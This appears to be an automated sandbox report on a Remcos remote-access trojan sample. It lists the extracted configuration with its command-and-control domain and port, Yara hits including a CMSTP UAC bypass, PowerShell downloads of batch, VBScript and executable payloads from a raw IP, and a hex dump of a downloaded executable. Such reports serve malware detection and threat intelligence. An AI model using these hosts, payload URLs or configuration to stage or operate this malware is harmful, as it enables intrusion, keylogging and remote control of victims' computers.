Malware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara detected Remcos RAT

Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\vqqcre	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\mdvbfllr	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\yigmovm	Joe Sandbox ML: detected

Source: cmd.exe, 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_64955134-1

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 27.2.explorer.exe.4bedb57.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.explorer.exe.4dbab57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.4a65b57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cmd.exe.55cfa8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.explorer.exe.4e79b57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.4a20a8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.explorer.exe.4e34a8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DZIPR.exe.35b39ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cmd.exe.5ba00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.explorer.exe.4d75a8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.explorer.exe.4bee757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.55eea8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DZIPR.exe.35b45ce.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cmd.exe.5615757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5634757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.4a66757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.explorer.exe.4e7a757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.cmd.exe.5614b57.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.DZIPR.exe.356e901.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5c400c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.cmd.exe.5633b57.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.explorer.exe.4dbb757.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.cmd.exe.54200c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.explorer.exe.4ba8a8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.3213566358.0000000002F12000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DZIPR.exe PID: 4568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5972, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\mdvbfllr, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\yigmovm, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vqqcre, type: DROPPED

Source:	Binary string: msacm32.pdbUGP source: cmd.exe, 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036343374.0000000002C82000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184703461.00000000029D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213712123.0000000002F28000.00000008.00000001.01000000.00000000.sdmp, vqqcre.21.dr
Source:	Binary string: msacm32.pdb source: cmd.exe, 00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036343374.0000000002C82000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184703461.00000000029D2000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213712123.0000000002F28000.00000008.00000001.01000000.00000000.sdmp, vqqcre.21.dr
Source:	Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000F.00000002.2746058035.0000000003658000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2746812228.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036465792.0000000004671000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036745577.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185088273.00000000056D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184797234.0000000005235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036747790.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036489203.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3212927126.000000000522C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213166560.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185147377.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184866847.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3214092572.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213878036.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DZIPR.exe, 0000000F.00000002.2746058035.0000000003658000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2746812228.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036465792.0000000004671000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036745577.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3185088273.00000000056D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184797234.0000000005235000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036747790.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036489203.00000000049CB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3212927126.000000000522C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213166560.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185147377.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3184866847.00000000047F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3214092572.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213878036.0000000004A8F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 0000000E.00000003.2720616296.000000000267B000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000010.00000002.2799378100.000000006C558000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.15.dr, DZIPR.dll.14.dr

Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: 14_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	14_2_0040301A
Source: C:\Users\user\AppData\Roaming\AUGUST.exe	Code function: 14_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	14_2_00402B79
Source: C:\Users\user\DZIPR.exe	Code function: 15_2_6FA6748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	15_2_6FA6748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 16_2_6C53748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	16_2_6C53748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 20_2_6FD0748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	20_2_6FD0748E

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: fullimmersion777.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Length: 4809996Last-Modified: Wed, 25 Sep 2024 11:52:30 GMTContent-Type: application/x-msdownloadDate: Wed, 25 Sep 2024 14:03:22 GMTETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996"Accept-Ranges: bytesServer: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 7e f8 26 4c 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 14 01 00 00 c8 01 00 00 00 00 00 ef 1d 01 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 03 00 00 02 00 00 02 33 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 50 01 00 b4 00 00 00 00 a0 01 00 04 8d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 13 01 00 00 10 00 00 00 14 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ea 30 00 00 00 30 01 00 00 32 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 29 00 00 00 70 01 00 00 08 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 04 8d 01 00 00 a0 01 00 00 8e 01 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec 81 ec 00 09 00 00 53 56 57 6a 27 e8 8a 0f 00 00 8b 75 08 ff 76 0c 8b 3d 60 32 41 00 ff 36 50 8d 85 00 f7 ff ff 50 ff d7 83 65 08 00 83 c4 14 83 7e 10 00 76 38 8d 5e 14 ff 33 8d 85 00 ff ff ff 68 10 33 41 00 50 ff d7 83 c4 0c 8d 85 00 ff ff ff 50 8d 85 00 f7 ff ff 50 ff 15 70 31 41 00 ff 45 08 8b 45 08 83 c3 04 3b 46 10 72 cb 8d 85 00 f7 ff ff 50 e8 2c 66 00 00 59 e8 8b 2d 00 00 6a 0a ff 15 74 31 41 00 cc ff 74 24 04 e8 6c ff ff ff cc 33 c0 39 05 e4 77 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 dc 77 41 00 ff 15 f4 32 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 18 00 83 7c 24 08 00 75 07 c7 40 18 01 00 00 00 33 c0 c2 08 00 8b 44 24 04 85 c0 56 8b f1 89 06 74 06 8b 08 50 ff 51 04 8b c6 5e c2 04 00 8b 54 24 04 56 8b 74 24 0c 8b c2 0f b7 0e 66 89 0a 42 42 46 46 66 85 c9 75 f1 5e c3 8b 4c 24 04 33 c0 66 39 01 74 08 40 66 83 3c 41 00 75 f8 c3 53 8b 5c 24 08 56 8b f1 43 3b 5e 08 74 4c 57 33 c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 b4 0a 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 88 0a 01 00 59 8b 46 04 89 3e 66 83 24 47 00

Source: Joe Sandbox View

ASN Name: VOXILITYGB VOXILITYGB

Source: global traffic	HTTP traffic detected: GET /ffo.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hi.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25
Source: unknown	TCP traffic detected without corresponding DNS query: 172.94.3.25

Source: global traffic	HTTP traffic detected: GET /ffo.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /hi.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive

Source: 55Ka50lb6Z.bat	String found in binary or memory: http://172.94.3.25/ffo.bat
Source: 55Ka50lb6Z.bat	String found in binary or memory: http://172.94.3.25/hi.vbs
Source: DZIPR.exe, 0000000F.00000002.2744697622.0000000003422000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c0rl.m%L
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: DZIPR.exe, 0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: AUGUST.exe, 0000000E.00000003.2720616296.0000000002ECC000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 0000000E.00000003.2723372410.0000000002650000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000F.00000003.2739137357.0000000003D6B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
